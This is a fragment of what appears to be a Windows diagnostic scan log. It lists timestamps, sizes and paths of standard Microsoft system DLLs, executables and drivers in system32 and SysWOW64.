2015-09-19 16:11 - 2010-11-20 15:27 - 00312832 _____ (Microsoft Corporation) C:\Windows\system32\Wldap32.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\scansetting.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00299520 _____ (Microsoft Corporation) C:\Windows\system32\tsmf.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00297984 _____ (Microsoft Corporation) C:\Windows\system32\ws2_32.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\QAGENT.DLL
2015-09-19 16:11 - 2010-11-20 15:27 - 00263168 _____ (Microsoft Corporation) C:\Windows\system32\vpnike.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00257024 _____ (Microsoft Corporation) C:\Windows\system32\stobject.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00253440 _____ (Microsoft Corporation) C:\Windows\system32\tcpipcfg.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00244736 _____ (Microsoft Corporation) C:\Windows\system32\sqmapi.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00244224 _____ (Microsoft Corporation) C:\Windows\system32\spp.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00236032 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00229888 _____ (Microsoft Corporation) C:\Windows\system32\XpsRasterService.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\QSHVHOST.DLL
2015-09-19 16:11 - 2010-11-20 15:27 - 00220672 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\umrdp.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\ncsi.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00209920 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00200192 _____ (Microsoft Corporation) C:\Windows\system32\tscfgwmi.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00183808 _____ (Microsoft Corporation) C:\Windows\system32\prncache.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00169984 _____ (Microsoft Corporation) C:\Windows\system32\tspubwmi.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00165376 _____ (Microsoft Corporation) C:\Windows\system32\netid.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00121856 _____ (Microsoft Corporation) C:\Windows\system32\SessEnv.dll
2015-09-19 16:11 - 2010-11-20 15:27 - 00109056 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 03391488 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 02746880 _____ (Microsoft Corporation) C:\Windows\system32\gameux.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 02067456 _____ (Microsoft Corporation) C:\Windows\system32\d3d9.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 01632256 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 01244160 _____ (Microsoft Corporation) C:\Windows\system32\imapi2fs.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 01161216 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 01137664 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00955904 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00934912 _____ (Microsoft Corporation) C:\Windows\system32\FirewallControlPanel.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00853504 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2015-09-19 16:11 - 2010-11-20 15:26 - 00787968 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00784896 _____ (Microsoft Corporation) C:\Windows\system32\gpprefcl.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00777728 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00715264 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00658944 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00630272 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\ipsmsnap.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00569344 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00551936 _____ (Microsoft Corporation) C:\Windows\system32\localsec.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00503296 _____ (Microsoft Corporation) C:\Windows\system32\imapi2.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00501248 _____ (Microsoft Corporation) C:\Windows\system32\IPSECSVC.DLL
2015-09-19 16:11 - 2010-11-20 15:26 - 00422912 _____ (Microsoft Corporation) C:\Windows\system32\drvstore.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00403968 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00381440 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00357888 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00321024 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00317952 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\framedynos.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00281600 _____ (Microsoft) C:\Windows\system32\DShowRdpFilter.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\framedyn.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00257024 _____ (Microsoft Corporation) C:\Windows\system32\mfreadwrite.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00252928 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\hgprint.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00183296 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00171520 _____ (Microsoft Corporation) C:\Windows\system32\fde.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00166912 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00145920 _____ (Microsoft Corporation) C:\Windows\system32\IPHLPAPI.DLL
2015-09-19 16:11 - 2010-11-20 15:26 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\dot3api.dll
2015-09-19 16:11 - 2010-11-20 15:26 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\LSCSHostPolicy.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 01927680 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 01796096 _____ (Microsoft Corporation) C:\Windows\system32\certmgr.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 01600512 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 01504256 _____ (Microsoft Corporation) C:\Windows\system32\wbengine.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 01456128 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 01116672 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00958464 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00897536 _____ (Microsoft Corporation) C:\Windows\system32\azroles.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00705024 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2015-09-19 16:11 - 2010-11-20 15:25 - 00692224 _____ (Microsoft Corporation) C:\Windows\system32\cscsvc.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00594432 _____ (Microsoft Corporation) C:\Windows\system32\comdlg32.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00577024 _____ (Microsoft Corporation) C:\Windows\system32\AdmTmpl.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00559104 _____ (Microsoft Corporation) C:\Windows\system32\spoolsv.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00533504 _____ (Microsoft Corporation) C:\Windows\system32\vds.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\biocpl.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\cscui.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00479232 _____ (Microsoft Corporation) C:\Windows\system32\appmgr.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00464384 _____ (Microsoft Corporation) C:\Windows\system32\taskeng.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00412160 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\wisptis.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00390656 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00307200 _____ (Microsoft Corporation) C:\Windows\system32\wusa.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00299520 _____ (Microsoft Corporation) C:\Windows\system32\rdpshell.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\schtasks.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00240640 _____ (Microsoft Corporation) C:\Windows\system32\cscobj.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\rdpclip.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00199168 _____ (Microsoft Corporation) C:\Windows\system32\PkgMgr.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\credui.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00178176 _____ (Microsoft Corporation) C:\Windows\system32\rdpinit.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00177152 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2015-09-19 16:11 - 2010-11-20 15:25 - 00067072 _____ (Microsoft Corporation) C:\Windows\splwow64.exe
2015-09-19 16:11 - 2010-11-20 15:25 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\PushPrinterConnections.exe
2015-09-19 16:11 - 2010-11-20 15:24 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\FXSSVC.exe
2015-09-19 16:11 - 2010-11-20 15:24 - 00653312 _____ (Microsoft Corporation) C:\Windows\system32\lpksetup.exe
2015-09-19 16:11 - 2010-11-20 15:24 - 00477696 _____ (Microsoft Corporation) C:\Windows\system32\PhotoScreensaver.scr
2015-09-19 16:11 - 2010-11-20 15:24 - 00442368 _____ (Microsoft Corporation) C:\Windows\system32\winspool.drv
2015-09-19 16:11 - 2010-11-20 15:24 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\msinfo32.exe
2015-09-19 16:11 - 2010-11-20 15:24 - 00345088 _____ (Microsoft Corporation) C:\Windows\system32\cmd.exe
2015-09-19 16:11 - 2010-11-20 15:24 - 00343040 _____ (Microsoft Corporation) C:\Windows\system32\lsm.exe
2015-09-19 16:11 - 2010-11-20 15:24 - 00337920 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2015-09-19 16:11 - 2010-11-20 15:24 - 00288256 _____ (Microsoft Corporation) C:\Windows\system32\MSNP.ax
2015-09-19 16:11 - 2010-11-20 15:24 - 00272896 _____ (Microsoft Corporation) C:\Windows\system32\mcbuilder.exe
2015-09-19 16:11 - 2010-11-20 15:24 - 00122880 _____ (Microsoft Corporation) C:\Windows\system32\aitagent.exe
2015-09-19 16:11 - 2010-11-20 14:55 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2015-09-19 16:11 - 2010-11-20 14:51 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-09-19 16:11 - 2010-11-20 14:32 - 05066752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AuthFWSnapin.dll
2015-09-19 16:11 - 2010-11-20 14:30 - 00079232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvgumd32.dll
2015-09-19 16:11 - 2010-11-20 14:24 - 01292096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2015-09-19 16:11 - 2010-11-20 14:23 - 00144768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\basecsp.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 02755072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themeui.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 01712640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xpsservices.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 01667584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setupapi.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 01619456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2015-09-19 16:11 - 2010-11-20 14:21 - 01363456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Query.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 01229824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 01175040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 01128448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vssapi.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 01115136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RacEngn.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 01010688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00980992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00646144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFolder.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00626176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00505856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00492032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00351232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00350208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shlwapi.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00283648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsGdiConverter.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00270848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsmf.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00269824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wldap32.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00224256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\upnp.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00204800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00172544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spp.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00140800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00113664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SessEnv.dll
2015-09-19 16:11 - 2010-11-20 14:21 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\userenv.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 01414144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 01328128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\propsys.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 00801280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NaturalLanguage6.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\odbc32.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 00563712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 00547840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PortableDeviceApi.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 00406528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcfgx.dll
2015-09-19 16:11 - 2010-11-20 14:20 - 00152064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 02151936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmcndmgr.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 01493504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 01390080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 01236992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00741376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00732160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imapi2fs.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00716800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstime.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00599552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00584192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpprefcl.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00541696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00389120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdrm.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00296448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00257024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00232448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswsock.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00206336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\framedynos.dll
2015-09-19 16:11 - 2010-11-20 14:19 - 00196608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfreadwrite.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 02522624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgeng.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 01828352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d9.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 01792000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 01555456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certmgr.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 01371136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 01154048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 01076736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00854016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbghelp.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00762880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\azroles.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00640512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00522752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00508416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00485888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comdlg32.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00342016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00339968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appmgr.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00323072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drvstore.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00270336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00252928 _____ (Microsoft) C:\Windows\SysWOW64\DShowRdpFilter.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00219136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10_1core.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credui.dll
2015-09-19 16:11 - 2010-11-20 14:18 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dot3api.dll
2015-09-19 16:11 - 2010-11-20 14:17 - 02616320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2015-09-19 16:11 - 2010-11-20 14:17 - 01049600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2015-09-19 16:11 - 2010-11-20 14:17 - 00302592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
2015-09-19 16:11 - 2010-11-20 14:17 - 00220672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mcbuilder.exe
2015-09-19 16:11 - 2010-11-20 14:17 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskeng.exe
2015-09-19 16:11 - 2010-11-20 14:08 - 00837632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2015-09-19 16:11 - 2010-11-20 14:08 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2015-09-19 16:11 - 2010-11-20 13:04 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2015-09-19 16:11 - 2010-11-20 12:52 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2015-09-19 16:11 - 2010-11-20 12:44 - 00229888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\1394ohci.sys
2015-09-19 16:11 - 2010-11-20 11:58 - 00244224 _____ (Microsoft Corporation) C:\Windows\system32\vmicsvc.exe
2015-09-19 16:11 - 2010-11-20 11:28 - 00468992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2015-09-19 16:11 - 2010-11-20 11:27 - 00514560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\csc.sys
2015-09-19 16:11 - 2010-11-20 11:27 - 00413184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2015-09-19 16:11 - 2010-11-20 11:27 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2015-09-19 16:11 - 2010-11-20 11:27 - 00167936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2015-09-19 16:11 - 2010-11-20 11:27 - 00158208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2015-09-19 16:11 - 2010-11-20 11:26 - 00328192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\udfs.sys
2015-09-19 16:11 - 2010-11-20 11:26 - 00287744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2015-09-19 16:11 - 2010-11-20 11:25 - 00753664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2015-09-19 16:11 - 2010-11-20 11:23 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2015-09-19 16:11 - 2010-11-20 11:23 - 00261632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2015-09-19 16:11 - 2010-11-20 11:21 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
